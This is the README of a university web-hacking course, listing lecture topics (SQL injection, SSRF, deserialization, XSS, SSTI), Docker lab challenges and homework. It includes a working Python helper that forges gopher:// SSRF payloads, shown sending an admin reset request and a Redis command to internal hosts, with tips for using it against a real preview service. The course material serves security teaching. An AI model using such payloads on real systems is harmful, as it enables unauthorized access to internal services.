Open-source Traditional Chinese learning resources for web hacking - 程式安全 (Software Security), Fall 2021

How to Hack Websites

Videos

Topics

Part I

Full slide

  • Web & Web security introduction [slide]
  • Access control & Business logic
  • Recon & Information leak [slide]
  • Insecure Upload / Path traversal / LFI [slide]
  • Basic injection [slide]
    • Code injection
    • Command injection
    • SQL injection: Basic

Part II

Full slide

  • SQL injection: Advanced
    • Union-based
    • Boolean-based
    • Other
  • Server-side request forgery (SSRF)
  • Insecure deserialization
    • Intro
    • Pickle

Part III

Full slide

  • Insecure deserialization [slide]
    • PHP
    • POP Chain
    • Misc (Java, .NET etc.)
  • Frontend security: Basic [slide]
    • Same-origin policy
    • CSRF
    • XSS
  • Frontend security: Content Security Policy (CSP) [slide]
  • Frontend security: Advanced
  • Advanced injection
    • NoSQL injection
    • Server-side template injection (SSTI)
  • Misc
    • JavaScript prototype pollution [slide]
    • XXE

Labs

The number after each challenge name is the port the Docker container exposes on the host.

  • Basic
    • Cat Shop 8100
  • SQL injection
    • Login me: Login bypass 8200
    • Login me again: UNION-based SQL injection 8201
  • Command injection
    • DNS tool 8300
    • DNS tool: WAF edition 8301
  • LFI
    • Meow site: Basic LFI 8400
    • HakkaMD: LFI to RCE 8401
  • SSRF
    • Web Preview Service: Use gopher:// to forge a request 8500
    • SSRFrog: Bypass blacklist 8501
  • Deserialization
    • Pickle 8600
    • Cat: Basic PHP unserialize 8601
    • Magic cat: POP chain 8602
  • SSTI
    • Jinja2 SSTI 8700
  • Frontend
    • XSS 8800
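The Web Preview Service lab asks you to forge a request with `gopher://`. The reason this works: a fetcher that hands URLs to libcurl (or another gopher-aware client) opens a TCP connection to the given host and port, discards the one-character gopher item type, and writes the percent-decoded selector to the socket verbatim, so the selector can carry a complete HTTP request (or a Redis command, or anything else line-based) to a service the attacker cannot reach directly. The code below is an added example for this README, not lab or course code; the internal host, port and `/admin/reset` path are made up, and `gopher_wire_bytes` models the client's behaviour so a payload can be checked offline before use.

```python
"""Forge an HTTP request to an internal service through a gopher:// URL
(SSRF via gopher). Added example for this README; target host, port and
path are invented."""
from urllib.parse import quote, unquote_to_bytes, urlsplit


def forge_gopher_raw(host: str, port: int, raw: bytes) -> str:
    """Wrap arbitrary bytes for delivery. The "_" is a throw-away gopher
    item-type character (the client strips it), and quote(safe="") encodes
    spaces, CRLF and every reserved byte so the URL survives the vulnerable
    application's own URL parsing."""
    return f"gopher://{host}:{port}/_" + quote(raw, safe="")


def forge_gopher_http(host: str, port: int, method: str, path: str,
                      headers=None, body: str = "") -> str:
    """Build a full HTTP/1.1 request and wrap it with forge_gopher_raw.
    Host goes first; Content-Length is filled in when there is a body, since
    nothing downstream will compute it for us."""
    ordered = {"Host": f"{host}:{port}"}
    ordered.update(headers or {})
    if body:
        ordered.setdefault("Content-Length", str(len(body.encode())))
    lines = [f"{method} {path} HTTP/1.1"]
    lines += [f"{k}: {v}" for k, v in ordered.items()]
    raw = ("\r\n".join(lines) + "\r\n\r\n" + body).encode()
    return forge_gopher_raw(host, port, raw)


def gopher_wire_bytes(url: str) -> bytes:
    """Model of what a curl-style gopher client sends after connecting:
    percent-decode the selector, drop its leading item-type byte, append
    CRLF. Use it to eyeball a payload before pointing it at a target."""
    parts = urlsplit(url)
    selector = unquote_to_bytes(parts.path[1:])   # drop the leading "/"
    return selector[1:] + b"\r\n"


if __name__ == "__main__":
    url = forge_gopher_http(
        "127.0.0.1", 8080, "POST", "/admin/reset",
        {"Content-Type": "application/x-www-form-urlencoded"},
        "user=admin",
    )
    print(url)
    print(gopher_wire_bytes(url).decode())
    # Same wrapper carries non-HTTP protocols, e.g. a Redis PING:
    print(gopher_wire_bytes(forge_gopher_raw("10.0.0.5", 6379, b"PING")))
```

Two caveats when using this against a real preview service. The client appends its own CRLF after the selector, so the server sees a stray empty line after the body; HTTP/1.1 servers tolerate that, but it matters for protocols that treat every line as a command. And if the application URL-decodes the parameter once before passing it on, the payload has to be percent-encoded a second time, which is exactly the kind of thing `gopher_wire_bytes` lets you verify.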

Homework

  • Imgura: Information Leak / Upload / LFI
  • DVD Screensaver: Path traversal / SQL injection / Signed Cookie
  • Profile Card: XSS / CSRF / CSP Bypass
  • Double SSTI: SSTI
  • Log me in: FINAL: SQL injection / Information Leak